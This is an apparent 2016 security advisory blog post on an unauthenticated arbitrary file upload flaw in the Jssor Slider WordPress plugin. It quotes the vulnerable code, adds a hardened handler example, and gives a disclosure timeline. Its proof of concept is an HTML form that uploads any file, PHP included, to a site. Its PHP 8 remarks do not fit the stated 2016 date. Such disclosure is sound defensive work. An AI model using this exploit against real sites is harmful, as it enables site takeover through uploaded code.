24 Jun 2016

Arbitrary File Upload Vulnerability in Jssor Slider

Recently we have been finding a lot of vulnerabilities in WordPress plugins by monitoring our websites for what look to be requests related to hacking attempts. That has led to these plugins either being fixed or pulled from the Plugin Directory so that more websites are not made vulnerable. Getting a plugin removed from the Plugin Directory obviously doesn't do anything for people already running it, so WordPress should finally take up our suggestion to warn about the fact that they removed a plugin for a security issue. In the meantime, even if you don't use our service, you can get warned about plugins like this with our Plugin Vulnerabilities plugin, since even without being signed up for the service you get warned about vulnerabilities in plugins we are seeing hacking attempts against.

We are always looking for ways to improve our data collection so that we can provide our customers with the best data possible. To that end we are looking at ways to gather more data of the kind that allowed us to catch those new vulnerabilities. In working on that we came across another vulnerability, one that indicates that others have not been doing this work.

There are a number of websites that report on hacking attempts, and in looking at one of those, abuseipdb.com, we came across a report of a request for the file /wp-content/plugins/jssor-slider/assets/css/jssor-slider.css as part of an attack in May of last year. That file is part of the plugin Jssor Slider.

That plugin has a file upload capability, and since file upload functionality is probably a hacker's number one target when trying to hack websites, we first went to check on that and found that it allowed the upload of arbitrary files.

When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:

public function register_ajax_calls() {
 
	if ( isset( $_REQUEST['action'] ) ) {
		switch ( $_REQUEST['action'] ) {
			case 'add_new_slider_library' :
				add_action( 'admin_init', 'jssor_slider_library' );
				function jssor_slider_library() {
 
					include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
				}
				break;
			case 'upload_library' :
				add_action( 'admin_init', 'upload_library' );
				function upload_library() {
 
					include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
				}
				break;
		}
	}	
}

Neither case checks who is making the request, and admin-ajax.php fires the admin_init action for every request it receives, whether or not the visitor is logged in. That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn't do any checks as to who is making the request (no capability check and no nonce) and does not restrict what type of files can be uploaded, so a PHP file is accepted just as readily as an image.

Considering how easy it was for us to find the vulnerability it certainly looks like we were the first people other than the hacker to check on the plugin.

It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the constant that file uses without defining (it is only defined once WordPress has loaded the plugin) isn't treated as a fatal error. On PHP 7 and earlier an undefined constant only raises a notice and evaluates to its own name as a string, so the direct request goes through; PHP 8 throws an Error instead, which stops the script, and the admin-ajax.php route is then the one that works.
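As an added example, not code from the plugin or from its version 1.4 fix, this is how the same upload could be exposed under admin-ajax.php without the three problems above: it is only registered for logged-in users, it checks a capability and a nonce, and it hands the file to WordPress's own upload handling with an explicit list of allowed types. The hook and function names jssor_example_upload_library and the nonce action jssor_upload_library are assumptions chosen for the illustration; everything else used is a WordPress core API.

```php
<?php
// Added example (not the plugin's code): a hardened admin-ajax.php upload handler.
// The names jssor_example_upload_library and jssor_upload_library are assumptions
// made for this illustration; the other functions are WordPress core APIs.

// wp_ajax_{action} hooks only run for logged-in users. admin_init, which the
// vulnerable plugin hooked, runs for every request to admin-ajax.php, including
// anonymous ones, so hooking admin_init is the first mistake to avoid.
add_action( 'wp_ajax_jssor_upload_library', 'jssor_example_upload_library' );

function jssor_example_upload_library() {
	// 1. Authorization: only users holding the capability (Administrators by default).
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'insufficient privileges' );
	}

	// 2. CSRF: the form must carry a nonce generated for this action with
	//    wp_nonce_field( 'jssor_upload_library', '_ajax_nonce' ). check_ajax_referer()
	//    dies with a -1 response when the nonce is missing or invalid.
	check_ajax_referer( 'jssor_upload_library', '_ajax_nonce' );

	if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
		wp_send_json_error( 'no file uploaded' );
	}

	// 3. File type: an explicit allow-list of what a slider actually needs.
	//    wp_handle_upload() checks the extension against this list and also sniffs
	//    the content through wp_check_filetype_and_ext(), so a PHP script renamed
	//    to .jpg is rejected along with anything not listed here.
	$overrides = array(
		'test_form' => false,
		'mimes'     => array(
			'jpg|jpeg' => 'image/jpeg',
			'png'      => 'image/png',
			'gif'      => 'image/gif',
		),
	);

	if ( ! function_exists( 'wp_handle_upload' ) ) {
		require_once ABSPATH . 'wp-admin/includes/file.php';
	}

	// 4. Storage: wp_handle_upload() writes into the standard uploads directory
	//    with a unique filename, rather than into a plugin-chosen path.
	$result = wp_handle_upload( $_FILES['file'], $overrides );

	if ( isset( $result['error'] ) ) {
		wp_send_json_error( $result['error'] );
	}

	wp_send_json_success( array( 'file' => $result['file'], 'url' => $result['url'] ) );
}
```

The admin page that offers the upload has to emit the nonce field inside the form and post to admin-ajax.php with action=jssor_upload_library. The capability check alone would already reject anonymous visitors (they hold no capabilities), but the nonce is what stops a logged-in administrator from being made to submit the upload from a page on another site, and the MIME allow-list is what turns "arbitrary file upload" into "image upload".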

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/20/2016 – Developer notified.
  • 6/24/2016 – WordPress.org Plugin Directory notified.
  • 6/28/2016 – Removed from Plugin Directory.
  • 7/1/2016 – Version 1.4 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
